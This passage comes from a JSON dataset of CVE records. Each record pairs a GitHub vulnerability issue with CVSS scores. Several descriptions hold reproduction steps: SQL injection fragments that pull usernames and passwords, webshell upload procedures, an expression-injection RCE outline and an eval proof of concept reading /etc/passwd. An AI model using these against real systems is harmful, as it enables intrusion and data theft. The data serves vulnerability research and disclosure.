NUMBERTAG a9d0 sp NUMBERTAG fffc NUMBERTAG a8e0 T0) Error location NUMBERTAG ba NUMBERTAG in ppsig::printui(std::ostream&, APITAG std::char_traits APITAG , std::allocator APITAG > const&, APITAG ) const ( PATHTAG ) Testcase path : PATHTAG Testcase size NUMBERTAG APITAG",
  72380. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  72381. "severity": "CRITICAL",
  72382. "baseScore": 9.8,
  72383. "impactScore": 5.9,
  72384. "exploitabilityScore": 3.9
  72385. },
  72386. {
  72387. "CVE_ID": "CVE-2021-41746",
  72388. "Issue_Url_old": "https://github.com/purple-WL/Yonyou-TurboCRM-SQL-injection/issues/1",
  72389. "Issue_Url_new": "https://github.com/purple-wl/yonyou-turbocrm-sql-injection/issues/1",
  72390. "Repo_new": "purple-wl/yonyou-turbocrm-sql-injection",
  72391. "Issue_Created_At": "2021-09-26T09:31:04Z",
  72392. "description": "SQL injection. Yonyou APITAG is a customer relationship management system. Yonyou APITAG has SQL injection vulnerabilities. Attackers can use the vulnerabilities to obtain sensitive database information. Visit FILETAG and click OK FILETAG Capture the packet and enter the SQL statement WAITFOR DELAY NUMBERTAG in the orgcode parameter There is a delay and an error is reported: FILETAG Use APITAG to scan for injection points FILETAG",
  72393. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  72394. "severity": "HIGH",
  72395. "baseScore": 7.5,
  72396. "impactScore": 3.6,
  72397. "exploitabilityScore": 3.9
  72398. },
  72399. {
  72400. "CVE_ID": "CVE-2021-41752",
  72401. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4779",
  72402. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4779",
  72403. "Repo_new": "jerryscript-project/jerryscript",
  72404. "Issue_Created_At": "2021-09-23T13:13:53Z",
  72405. "description": "stack overflow in APITAG APITAG revision e1ce7dd7 Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Linu NUMBERTAG generic NUMBERTAG with glibc NUMBERTAG Build steps PATHTAG clean debug compile flag= fsanitize=address \\ compile flag= m NUMBERTAG compile flag= fno omit frame pointer \\ compile flag= fno common compile flag= g strip=off \\ system allocator=on logging=on linker flag= fuse ld=gold \\ error messages=on lto=off stack limit NUMBERTAG Test case ERRORTAG Execution platform the same as the build platform. Output ERRORTAG Backtrace see above",
  72406. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  72407. "severity": "CRITICAL",
  72408. "baseScore": 9.8,
  72409. "impactScore": 5.9,
  72410. "exploitabilityScore": 3.9
  72411. },
  72412. {
  72413. "CVE_ID": "CVE-2021-41821",
  72414. "Issue_Url_old": "https://github.com/wazuh/wazuh/issues/9201",
  72415. "Issue_Url_new": "https://github.com/wazuh/wazuh/issues/9201",
  72416. "Repo_new": "wazuh/wazuh",
  72417. "Issue_Created_At": "2021-07-05T16:36:54Z",
  72418. "description": "Potential integer underflow in remote code. APITAG APITAG APITAG APITAG | | | | | | | Latest | Remoted| APITAG | APITAG | OS version | Hello team, After checking the remote code, we observed something that should be reviewed because it could incur an integer underflow. Specifically here: URLTAG After defining the size, and depending on the input value, the following can have a lower value: URLTAG For instance, with a buffer of APITAG Regards, Miguel Casares",
  72419. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  72420. "severity": "MEDIUM",
  72421. "baseScore": 6.5,
  72422. "impactScore": 3.6,
  72423. "exploitabilityScore": 2.8
  72424. },
  72425. {
  72426. "CVE_ID": "CVE-2021-41826",
  72427. "Issue_Url_old": "https://github.com/PlaceOS/auth/issues/36",
  72428. "Issue_Url_new": "https://github.com/placeos/auth/issues/36",
  72429. "Repo_new": "placeos/auth",
  72430. "Issue_Created_At": "2021-09-28T15:52:23Z",
  72431. "description": "CVETAG : URL Redirection to Untrusted Site APITAG Redirect'). The application accepts a user controlled input that specifies a link to an external site, and uses that link in a Redirect. This simplifies phishing attacks. CODETAG FILETAG Payload: URLTAG",
  72432. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  72433. "severity": "MEDIUM",
  72434. "baseScore": 6.1,
  72435. "impactScore": 2.7,
  72436. "exploitabilityScore": 2.8
  72437. },
  72438. {
  72439. "CVE_ID": "CVE-2021-41862",
  72440. "Issue_Url_old": "https://github.com/killme2008/aviatorscript/issues/421",
  72441. "Issue_Url_new": "https://github.com/killme2008/aviatorscript/issues/421",
  72442. "Repo_new": "killme2008/aviatorscript",
  72443. "Issue_Created_At": "2021-09-30T09:20:15Z",
  72444. "description": "There is a critical expression injection RCE vulnerability in this expression engine\uff08\u8be5\u8868\u8fbe\u5f0f\u5f15\u64ce\u5b58\u5728\u8868\u8fbe\u5f0f\u6ce8\u5165\u6f0f\u6d1e\uff09. The new object can be directly entered when entering the aviator expression, but it is not allowed to call non public static methods. You can use the APITAG to load the BCEL code to complete the RCE. First prepare a malicious APITAG Set the public static method exec to execute arbitrary commands. APITAG APITAG APITAG static\u65b9\u6cd5exec\u6765\u6267\u884c\u4efb\u610f\u547d\u4ee4\u3002\uff09 ERRORTAG Then encode it in BCEL. \uff08\u7136\u540e\u5c06\u5176BCEL\u7f16\u7801\u3002\uff09 ERRORTAG Prepare the vulnerability environment. Use the latest version of aviatorscript. \uff08\u51c6\u5907\u6f0f\u6d1e\u73af\u5883\u3002\u4f7f\u7528\u6700\u65b0\u7248\u7684aviatorscript\u3002\uff09 CODETAG Perform aviator expression injection. \uff08\u8fdb\u884caviator\u8868\u8fbe\u5f0f\u6ce8\u5165\u3002\uff09 CODETAG The command was executed successfully. \uff08\u6210\u529f\u6267\u884c\u547d\u4ee4\u3002\uff09 FILETAG",
  72445. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  72446. "severity": "CRITICAL",
  72447. "baseScore": 9.8,
  72448. "impactScore": 5.9,
  72449. "exploitabilityScore": 3.9
  72450. },
  72451. {
  72452. "CVE_ID": "CVE-2021-41868",
  72453. "Issue_Url_old": "https://github.com/onionshare/onionshare/issues/1396",
  72454. "Issue_Url_new": "https://github.com/onionshare/onionshare/issues/1396",
  72455. "Repo_new": "onionshare/onionshare",
  72456. "Issue_Created_At": "2021-08-21T11:13:36Z",
  72457. "description": "File uploaded before checking for user's authentication. Version: APITAG cli NUMBERTAG installed via pip3) Start up: onionshare cli receive Observed behavior: Unauthenticated users (not passing the APITAG Basic_ header) are still able to upload files on the remote machine running APITAG NUMBERTAG The problem is probably related to the logic in FILETAG in which files are uploaded and stored remotely before checking for user authentication. This issue is affecting both: POST /upload POST /upload ajax Proof of concept images attached FILETAG FILETAG",
  72458. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  72459. "severity": "CRITICAL",
  72460. "baseScore": 9.8,
  72461. "impactScore": 5.9,
  72462. "exploitabilityScore": 3.9
  72463. },
  72464. {
  72465. "CVE_ID": "CVE-2021-41921",
  72466. "Issue_Url_old": "https://github.com/201206030/novel-plus/issues/62",
  72467. "Issue_Url_new": "https://github.com/201206030/novel-plus/issues/62",
  72468. "Repo_new": "201206030/novel-plus",
  72469. "Issue_Created_At": "2021-09-29T03:20:17Z",
  72470. "description": "There is unrestricted file upload in your source code.. File path: PATHTAG Code: It allows unrestricted file upload. ERRORTAG Achieve the purpose of attacking the server by uploading evil jsp files. Example: FILETAG",
  72471. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  72472. "severity": "CRITICAL",
  72473. "baseScore": 9.8,
  72474. "impactScore": 5.9,
  72475. "exploitabilityScore": 3.9
  72476. },
  72477. {
  72478. "CVE_ID": "CVE-2021-41938",
  72479. "Issue_Url_old": "https://github.com/gongfuxiang/shopxo/issues/64",
  72480. "Issue_Url_new": "https://github.com/gongfuxiang/shopxo/issues/64",
  72481. "Repo_new": "gongfuxiang/shopxo",
  72482. "Issue_Created_At": "2021-09-30T03:31:31Z",
  72483. "description": "After entering the management page\uff0cthere is an arbitrary file upload vulnerability in NUMBERTAG locations. Affects version APITAG After entering the management page as admininstrator there is an arbitrary file upload vulnerability in NUMBERTAG locations , you can upload webshell into the site. The first location: APITAG the post url is APITAG the step is NUMBERTAG download the default theme from FILETAG NUMBERTAG unzip the zip NUMBERTAG Only delete files with \"php\" suffix due to file security check, new a evil file named FILETAG or APITAG in the \"css\" folder and the root folder FILETAG FILETAG NUMBERTAG Recompress the file as a new zip file NUMBERTAG upload it you will find the evil file is in APITAG and APITAG FILETAG The second location: APITAG the post url is APITAG like the first location NUMBERTAG download a casual plugin from FILETAG like this NUMBERTAG unzip the zip NUMBERTAG new a evil file named FILETAG in the APITAG folder NUMBERTAG Recompress the file as a new zip file NUMBERTAG upload it you will find the evil file is in APITAG FILETAG The third location: APITAG the post url is APITAG the step is NUMBERTAG new a evil file APITAG and compress the file as a new zip file NUMBERTAG upload it you will find the evil file in APITAG FILETAG",
  72484. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  72485. "severity": "HIGH",
  72486. "baseScore": 7.2,
  72487. "impactScore": 5.9,
  72488. "exploitabilityScore": 1.2
  72489. },
  72490. {
  72491. "CVE_ID": "CVE-2021-41945",
  72492. "Issue_Url_old": "https://github.com/encode/httpx/issues/2184",
  72493. "Issue_Url_new": "https://github.com/encode/httpx/issues/2184",
  72494. "Repo_new": "encode/httpx",
  72495. "Issue_Created_At": "2022-04-21T03:46:42Z",
  72496. "description": "Some URL can make httpx use URL with wrong info. After some research, I found that APITAG and APITAG may implicit parse wrong URL because of the improper implement of APITAG . And this issue may lead to some blacklist bypass. For example: APITAG CODETAG APITAG CODETAG Main reason: URLTAG APITAG parse ERRORTAG before returning the new URL, but the new URL string return by ERRORTAG may make some unintended changes on the new URL. For example: ERRORTAG So if a function is using APITAG , it may have the same issue as APITAG and APITAG , too APITAG example, APITAG ). I also made a patch PR for this issue by replacing ERRORTAG to: APITAG By the way, I think this issue is similar to FILETAG and FILETAG . If you want to assign a CVE id for this issue to remind httpx's user, you can use these categories.",
  72497. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
  72498. "severity": "CRITICAL",
  72499. "baseScore": 9.1,
  72500. "impactScore": 5.2,
  72501. "exploitabilityScore": 3.9
  72502. },
  72503. {
  72504. "CVE_ID": "CVE-2021-41947",
  72505. "Issue_Url_old": "https://github.com/intelliants/subrion/issues/887",
  72506. "Issue_Url_new": "https://github.com/intelliants/subrion/issues/887",
  72507. "Repo_new": "intelliants/subrion",
  72508. "Issue_Created_At": "2021-09-28T06:23:17Z",
  72509. "description": "SQL injection in visual mode. Login as admin Go to \" URLTAG UNION ALL SELECT username, password FROM sbr NUMBERTAG members APITAG FILETAG",
  72510. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  72511. "severity": "HIGH",
  72512. "baseScore": 7.2,
  72513. "impactScore": 5.9,
  72514. "exploitabilityScore": 1.2
  72515. },
  72516. {
  72517. "CVE_ID": "CVE-2021-41948",
  72518. "Issue_Url_old": "https://github.com/intelliants/subrion-plugin-contact_us/issues/8",
  72519. "Issue_Url_new": "https://github.com/intelliants/subrion-plugin-contact_us/issues/8",
  72520. "Repo_new": "intelliants/subrion-plugin-contact_us",
  72521. "Issue_Created_At": "2021-09-28T06:48:55Z",
  72522. "description": "1 click stored XSS from admin panel to site. Login into admin panel Go to APITAG Insert into List of subjects APITAG Go to APITAG Click subject FILETAG",
  72523. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  72524. "severity": "MEDIUM",
  72525. "baseScore": 5.4,
  72526. "impactScore": 2.7,
  72527. "exploitabilityScore": 2.3
  72528. },
  72529. {
  72530. "CVE_ID": "CVE-2021-41952",
  72531. "Issue_Url_old": "https://github.com/hieuminhnv/Zenario-CMS-9.0-last-version/issues/1",
  72532. "Issue_Url_new": "https://github.com/hieuminhnv/zenario-cms-last-version/issues/1",
  72533. "Repo_new": "hieuminhnv/zenario-cms-last-version",
  72534. "Issue_Created_At": "2021-09-30T08:49:15Z",
  72535. "description": "XSS upload file to .SVG in Zenario CMS NUMBERTAG Summary hi team, I found small XSS upload file to SVG. Info NUMBERTAG Zenario CMS NUMBERTAG last version NUMBERTAG APITAG NUMBERTAG bit) FILETAG Steps NUMBERTAG Login to account URLTAG FILETAG NUMBERTAG Choose Users & Contacts and create any user NUMBERTAG Click Image >> Upload an image FILETAG NUMBERTAG use burpsuite and capture request file a.svg FILETAG NUMBERTAG click to image avatar >> click right mouse >> Inspect Element (F NUMBERTAG found to link vlun svg FILETAG NUMBERTAG Copy domain >> open web >> BOOM XSS alert message FILETAG Inpact : Attacker can send malicious files to victims and steals victim's cookie leads to account takeover. The person viewing the image of a contact can be victim of XSS.",
  72536. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  72537. "severity": "MEDIUM",
  72538. "baseScore": 4.8,
  72539. "impactScore": 2.7,
  72540. "exploitabilityScore": 1.7
  72541. },
  72542. {
  72543. "CVE_ID": "CVE-2021-41959",
  72544. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4781",
  72545. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4781",
  72546. "Repo_new": "jerryscript-project/jerryscript",
  72547. "Issue_Created_At": "2021-09-27T07:23:09Z",
  72548. "description": "Unfreed float causing memory leak in ecma regexp object. APITAG revision NUMBERTAG ff5bf Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG Output ERRORTAG Backtrace ERRORTAG Expected behavior According to our analysis, the root cause of this assertion failed is at PATHTAG While getting next_set_status, function ecma op object APITAG called function APITAG which alloc a NUMBERTAG bit chunk memory use as a float number if index is larger than NUMBERTAG ffffff. This chunk is not freed, causing assertion failed. To repair, ecma_make_length_value(index) should be replaced by last_index created by ecma regexp APITAG",
  72549. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  72550. "severity": "HIGH",
  72551. "baseScore": 7.5,
  72552. "impactScore": 3.6,
  72553. "exploitabilityScore": 3.9
  72554. },
  72555. {
  72556. "CVE_ID": "CVE-2021-42006",
  72557. "Issue_Url_old": "https://github.com/gpertea/gclib/issues/11",
  72558. "Issue_Url_new": "https://github.com/gpertea/gclib/issues/11",
  72559. "Repo_new": "gpertea/gclib",
  72560. "Issue_Created_At": "2021-10-04T15:26:20Z",
  72561. "description": "Uninitialized GFF line info causes out of bounds read, possible out of bounds write.. Reproduce APITAG Input : FILETAG Steps to Reproduce NUMBERTAG Compile FILETAG (will fetch APITAG NUMBERTAG Decompress APITAG input: APITAG NUMBERTAG Run: APITAG Output: APITAG Root Cause URLTAG When APITAG reads a GFF line with no info segment, the APITAG at APITAG will not be set, causing it to take on whatever stale value happens to be in that location of the stack. Triggered accidentally, this can cause a segfault due to reading an invalid address here: URLTAG However, a maliciously crafted input may be able to place a valid pointer at this location, causing a more severe vulnerability. Proposed Patch At a minimum, t should be zeroed during initialization: ERRORTAG Ideally, the library should gracefully handle no info being found (this only works if t is zero initialized): ERRORTAG Credit This bug was detected using AFL URLTAG and localized using ARCUS URLTAG .",
  72562. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  72563. "severity": "HIGH",
  72564. "baseScore": 8.8,
  72565. "impactScore": 5.9,
  72566. "exploitabilityScore": 2.8
  72567. },
  72568. {
  72569. "CVE_ID": "CVE-2021-42057",
  72570. "Issue_Url_old": "https://github.com/blacksmithgu/obsidian-dataview/issues/615",
  72571. "Issue_Url_new": "https://github.com/blacksmithgu/obsidian-dataview/issues/615",
  72572. "Repo_new": "blacksmithgu/obsidian-dataview",
  72573. "Issue_Created_At": "2021-11-04T19:08:34Z",
  72574. "description": "Arbitrary Code Execution via APITAG Queries ( CVETAG ). Describe the bug I discovered a way to craft malicious markdown files that will cause the obsidian dataview plugin to execute arbitrary commands on users\u2019 systems. This is due to the unsafe use of eval within the APITAG URLTAG function located in PATHTAG This has been assigned a CVE of CVETAG CVETAG for tracking. To Reproduce The following proof of concept can be used to display a file on a user\u2019s system by executing the cat command: APITAG dataviewjs APITAG /etc/passwd NUMBERTAG stdout NUMBERTAG dv.span(stdout));\"\" APITAG ` A malicious user could leverage this vulnerability to execute arbitrary code on other users' systems by getting them to open an untrusted markdown file. This is especially dangerous in environments where users share vaults. Expected behavior APITAG should not make an unsafe call to eval using user supplied input. Additional Context Shortly after we privately disclosed this issue, MENTIONTAG promptly changed the default behavior of Dataview to no longer enable APITAG Queries by default (see release FILETAG . This helps protect new dataview users and provides a way for existing dataview users to mitigate this issue by disabling the APITAG Query functionality when opening untrusted markdown. MENTIONTAG is currently working on additional solutions and provided permission for us to open a public issue here for tracking.",
  72575. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  72576. "severity": "HIGH",
  72577. "baseScore": 7.8,
  72578. "impactScore": 5.9,
  72579. "exploitabilityScore": 1.8
  72580. },
  72581. {
  72582. "CVE_ID": "CVE-2021-42171",
  72583. "Issue_Url_old": "https://github.com/hieuminhnv/Zenario-CMS-9.0-last-version/issues/2",
  72584. "Issue_Url_new": "https://github.com/hieuminhnv/zenario-cms-last-version/issues/2",
  72585. "Repo_new": "hieuminhnv/zenario-cms-last-version",
  72586. "Issue_Created_At": "2021-10-05T10:49:07Z",
  72587. "description": "Upload file to RCE in Zenario CMS NUMBERTAG Summary hi team, I found high Upload file to RCE. Info Zenario CMS NUMBERTAG last version APITAG NUMBERTAG bit) FILETAG Steps NUMBERTAG Login to account URLTAG FILETAG NUMBERTAG Choose Documents >> Upload documents FILETAG NUMBERTAG Use burpsuite and capture request file FILETAG FILETAG NUMBERTAG Click Edit document metadata >> use burpsuite to capture >> save FILETAG NUMBERTAG In value current_value , edit value html to php FILETAG NUMBERTAG Click Actions >> view public link FILETAG APITAG link to URL >> BOOM FILETAG Inpact : An attacker could upload a dangerous executable file like a virus, malware, etc.. The web server can be compromised by uploading and executing a web shell which can run commands, browse system files, browse local resources, attack other servers, and exploit the local vulnerabilities, and so forth.",
  72588. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  72589. "severity": "HIGH",
  72590. "baseScore": 7.2,
  72591. "impactScore": 5.9,
  72592. "exploitabilityScore": 1.2
  72593. },
  72594. {
  72595. "CVE_ID": "CVE-2021-42185",
  72596. "Issue_Url_old": "https://github.com/shadoweb/wdja/issues/12",
  72597. "Issue_Url_new": "https://github.com/shadoweb/wdja/issues/12",
  72598. "Repo_new": "shadoweb/wdja",
  72599. "Issue_Created_At": "2021-10-06T08:00:02Z",
  72600. "description": "Wdja NUMBERTAG has a foreground SQL injection vulnerability. There is an SQL injection vulnerability in the foreground search function, through which an attacker can get the background account password",
  72601. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  72602. "severity": "CRITICAL",
  72603. "baseScore": 9.8,
  72604. "impactScore": 5.9,
  72605. "exploitabilityScore": 3.9
  72606. },
  72607. {
  72608. "CVE_ID": "CVE-2021-42195",
  72609. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/174",
  72610. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/174",
  72611. "Repo_new": "matthiaskramm/swftools",
  72612. "Issue_Created_At": "2021-10-07T13:17:16Z",
  72613. "description": "heap buffer overflow exists in the function APITAG in swfdump.c. system info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master a9d NUMBERTAG Command line PATHTAG D APITAG APITAG output NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG e8d3 at pc NUMBERTAG aca bp NUMBERTAG fffffffdee0 sp NUMBERTAG fffffffded0 READ of size NUMBERTAG at NUMBERTAG e8d3 thread T NUMBERTAG ac9 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG ffff NUMBERTAG a NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG c NUMBERTAG in _start ( PATHTAG NUMBERTAG e8d3 is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG ffff6f NUMBERTAG in malloc ( PATHTAG NUMBERTAG fa7 in rfx_alloc PATHTAG NUMBERTAG PATHTAG ) SUMMARY: APITAG heap buffer overflow PATHTAG APITAG Shadow bytes around the buggy address NUMBERTAG c0c7fff9cc NUMBERTAG fa fa fa fa fa NUMBERTAG c0c7fff9cd NUMBERTAG fa fa fa fa fa NUMBERTAG fa NUMBERTAG c0c7fff9ce0: fa fa fa fa NUMBERTAG fa fa fa fa NUMBERTAG c0c7fff9cf NUMBERTAG fa fa fa fa fa NUMBERTAG c0c7fff9d NUMBERTAG fa fa fa fa fa NUMBERTAG fa NUMBERTAG c0c7fff9d NUMBERTAG fa fa fa fa NUMBERTAG fa fa fa fa fa NUMBERTAG c0c7fff9d NUMBERTAG fa fa fa fa fa NUMBERTAG c0c7fff9d NUMBERTAG fa fa fa fa fa NUMBERTAG fa NUMBERTAG c0c7fff9d NUMBERTAG fa fa fa fa NUMBERTAG fa fa fa fa fa NUMBERTAG c0c7fff9d NUMBERTAG fa fa fa fa fa NUMBERTAG c0c7fff9d NUMBERTAG fa fa fa fa fa NUMBERTAG fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING POC APITAG URLTAG",
  72614. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  72615. "severity": "HIGH",
  72616. "baseScore": 7.8,
  72617. "impactScore": 5.9,
  72618. "exploitabilityScore": 1.8
  72619. },
  72620. {
  72621. "CVE_ID": "CVE-2021-42198",
  72622. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/168",
  72623. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/168",
  72624. "Repo_new": "matthiaskramm/swftools",
  72625. "Issue_Created_At": "2021-10-07T12:57:51Z",
  72626. "description": "A NULL pointer dereference exists in the function APITAG in rfxswf.c. system info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master a9d NUMBERTAG Command line PATHTAG D APITAG APITAG output NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG fac bp NUMBERTAG ffffed NUMBERTAG e0 sp NUMBERTAG fffffffdd NUMBERTAG T NUMBERTAG fab in APITAG PATHTAG NUMBERTAG bf8 in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG acd in main PATHTAG NUMBERTAG ffff NUMBERTAG a NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG c NUMBERTAG in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV PATHTAG APITAG NUMBERTAG ABORTING POC URLTAG",
  72627. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  72628. "severity": "MEDIUM",
  72629. "baseScore": 5.5,
  72630. "impactScore": 3.6,
  72631. "exploitabilityScore": 1.8
  72632. },
  72633. {
  72634. "CVE_ID": "CVE-2021-42204",
  72635. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/169",
  72636. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/169",
  72637. "Repo_new": "matthiaskramm/swftools",
  72638. "Issue_Created_At": "2021-10-07T13:00:58Z",
  72639. "description": "heap buffer overflow exists in the function APITAG in rfxswf.c. system info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master a9d NUMBERTAG Command line PATHTAG D APITAG APITAG output NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG efdf at pc NUMBERTAG d bp NUMBERTAG fffffffdbe0 sp NUMBERTAG fffffffdbd0 READ of size NUMBERTAG at NUMBERTAG efdf thread T NUMBERTAG c in APITAG PATHTAG NUMBERTAG cc in APITAG APITAG NUMBERTAG fbc in APITAG APITAG NUMBERTAG a NUMBERTAG in APITAG APITAG NUMBERTAG c2dc in fontcallback2 PATHTAG NUMBERTAG c6 in APITAG APITAG NUMBERTAG in main PATHTAG NUMBERTAG ffff NUMBERTAG a NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG c NUMBERTAG in _start ( PATHTAG NUMBERTAG efdf is located NUMBERTAG bytes to the left of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG ffff6f NUMBERTAG in malloc ( PATHTAG NUMBERTAG fa7 in rfx_alloc PATHTAG NUMBERTAG PATHTAG ) SUMMARY: APITAG heap buffer overflow PATHTAG APITAG Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9de0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9df0: fa fa fa fa fa fa fd fd fd fd fa[fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING POC APITAG URLTAG",
  72640. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  72641. "severity": "HIGH",
  72642. "baseScore": 7.8,
  72643. "impactScore": 5.9,
  72644. "exploitabilityScore": 1.8
  72645. },
  72646. {
  72647. "CVE_ID": "CVE-2021-42227",
  72648. "Issue_Url_old": "https://github.com/kindsoft/kindeditor/issues/336",
  72649. "Issue_Url_new": "https://github.com/kindsoft/kindeditor/issues/336",
  72650. "Repo_new": "kindsoft/kindeditor",
  72651. "Issue_Created_At": "2021-10-14T06:26:59Z",
  72652. "description": "There is a stored xss vulnerability in kindeditor NUMBERTAG APITAG description] > Cross APITAG Scripting (XSS) vulnerability exists in APITAG NUMBERTAG ia > a Google search PATHTAG and then the .html > file on the website that uses this editor (the file suffix is allowed). > > > > APITAG Type] > Cross Site Scripting (XSS) > > > > APITAG of Product] > URLTAG > > > > APITAG Product Code Base] > kindeditor NUMBERTAG APITAG Component] > POST PATHTAG HTTP NUMBERTAG Content Disposition: form data; APITAG APITAG > Content Type: text/html > > APITAG APITAG NUMBERTAG APITAG Type] > Remote > > > > APITAG Code execution] > true > > > > APITAG Vectors] > You just need to search in google: PATHTAG > Then upload the .html file on the website that uses this editor (the file suffix is allowed)",
  72653. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  72654. "severity": "MEDIUM",
  72655. "baseScore": 6.1,
  72656. "impactScore": 2.7,
  72657. "exploitabilityScore": 2.8
  72658. },
  72659. {
  72660. "CVE_ID": "CVE-2021-42242",
  72661. "Issue_Url_old": "https://github.com/jflyfox/jfinal_cms/issues/28",
  72662. "Issue_Url_new": "https://github.com/jflyfox/jfinal_cms/issues/28",
  72663. "Repo_new": "jflyfox/jfinal_cms",
  72664. "Issue_Created_At": "2021-10-10T14:34:59Z",
